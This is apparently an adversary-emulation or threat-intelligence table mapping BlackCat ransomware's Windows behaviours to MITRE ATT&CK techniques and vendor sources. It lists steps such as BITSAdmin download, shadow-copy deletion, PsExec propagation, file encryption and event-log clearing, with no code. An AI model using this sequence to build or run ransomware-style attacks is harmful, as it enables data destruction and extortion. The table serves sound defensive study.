Download BlackCat (Windows) via BITSAdmin.exe - T1105 Ingress Tool Transfer Mandiant
Authenticate with Domain Admin account credentials - T1078.002 Valid Accounts: Domain Accounts Microsoft
BlackCat (Windows) deletes volume shadow copies delete_shadow_copies T1490 Inhibit System Recovery Varonis
BlackCat (Windows) modifies bootloader disable_bootloader_recovery T1490 Inhibit System Recovery Microsoft
BlackCat (Windows) collects host UUID get_uuid T1082 System Information Discovery Varonis
BlackCat (Windows) discovers current username get_username T1033 System Owner/User Discovery Microsoft
BlackCat (Windows) discovers current hostname get_hostname T1082 System Information Discovery Microsoft
BlackCat (Windows) empties the recycling bin empty_recycling_bin T1485 Data Destruction Varonis
BlackCat (Windows) modifies the registry update_maxmpxct_settings T1112 Modify Registry Varonis
BlackCat (Windows) contains embedded PsExec setup_psexec T1027.009 Obfuscated Files or Information: Embedded Payloads Varonis
PsExec is compressed with zlib setup_psexec T1027 Obfuscated Files or Information Symantec
BlackCat (Windows) performs NetBIOS scans find_local_targets T1018 Remote System Discovery Varonis
BlackCat (Windows) executes PsExec to propagate propagate_via_psexec T1570 Lateral Tool Transfer Varonis
BlackCat (Windows) is executed using PsExec - T1569.002 System Services: Service Execution Varonis
BlackCat (Windows) enumerates local disk partitions mount_hidden_partitions T1082 System Information Discovery Varonis
BlackCat (Windows) mounts hidden partitions mount_hidden_partitions T1083 File and Directory Discovery Varonis
BlackCat (Windows) terminates processes killall_by_name T1489 Service Stop Varonis
BlackCat (Windows) terminates services terminate_services T1489 Service Stop Varonis
BlackCat (Windows) encrypts files using AES encrypt T1486 Data Encrypted for Impact Varonis
BlackCat (Windows) leaves ransom notes drop_ransom_note T1491.001 Defacement: Internal Defacement Varonis
BlackCat (Windows) changes the wallpaper set_wallpaper T1491.001 Defacement: Internal Defacement Varonis
BlackCat (Windows) deletes volume shadow copies again delete_shadow_copies T1490 Inhibit System Recovery Varonis
BlackCat (Windows) lists and clears logs clear_event_logs T1070.001 Indicator Removal: Clear Windows Event Logs Varonis